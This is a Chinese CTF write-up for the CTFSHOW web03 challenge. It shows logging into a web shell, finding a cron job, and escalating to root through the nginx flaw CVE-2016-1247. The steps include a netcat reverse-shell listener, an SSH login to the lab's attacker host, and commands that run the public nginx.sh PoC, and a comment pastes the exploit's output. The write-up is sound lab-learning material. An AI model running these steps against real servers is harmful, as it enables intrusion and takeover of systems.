CTFSHOW内部赛 web03_出题人不想跟你说话.jpg

admin 2022年1月5日23:14:22CTF专场评论21 views898字阅读2分59秒阅读模式

>

This site is best viewed in a modern browser with JavaScript enabled.

### id="flarum-content">

CTFSHOW内部赛 web03_出题人不想跟你说话.jpg

_yu_

0x01

根据网站里面隐晦的提示,猜测可能需要连菜刀,而且图片上有个cai可能是连接的密码。
果然如此,那我们直接找flag吧,发现flag在根目录下,但是没有权限打开。那就得提权了
在这里插入图片描述

0x02

根据提示说漏洞每2分钟触发一次,猜测可能有定时任务可利用,cat /etc/crontab
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
这个定时任务很可疑呀 一分钟一次,在网上经过各种搜索发现了nginx提权漏洞CVE-2016-1247,大家有兴趣的可以去仔细研究下。看下影响版本,正好在里面
CTFSHOW内部赛 web03_出题人不想跟你说话.jpgCTFSHOW内部赛 web03_出题人不想跟你说话.jpg
在网上查到了利用的方法。
1.反弹shell
我们先用ssh连接题目给的服务器用于反弹shell,ssh -p8022 [email protected]
输入密码ctfshow,成功连接,接着开启监听 nc -lvp 8888,被攻击的系统开启反弹。
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
2.下载所需的poc
https://www.seebug.org/vuldb/ssvid-92538
然后通过菜刀添加到目录中
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
3.使用poc

chmod +x nginx.sh
./nginx.sh
./nginx.sh /var/log/nginx/error.log

接着等待漏洞触发即可
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
CTFSHOW内部赛 web03_出题人不想跟你说话.jpg
在这里插入图片描述


Jazz

自闭.jpg


fzhshzh

执行nignx.sh报错是什么原因
[+] Starting the exploit as:
uid=33(www-data) gid=33(www-data) groups=33(www-data)

[+] Compiling the privesc shared library (/tmp/privesclib.c)
gcc: error trying to exec 'cc1': execvp: No such file or directory

[!] Failed to compile the privesc lib /tmp/privesclib.c.

[+] Cleaning up...

[+] Job done. Exiting with code 2


特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年1月5日23:14:22
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  CTFSHOW内部赛 web03_出题人不想跟你说话.jpg http://cn-sec.com/archives/720132.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: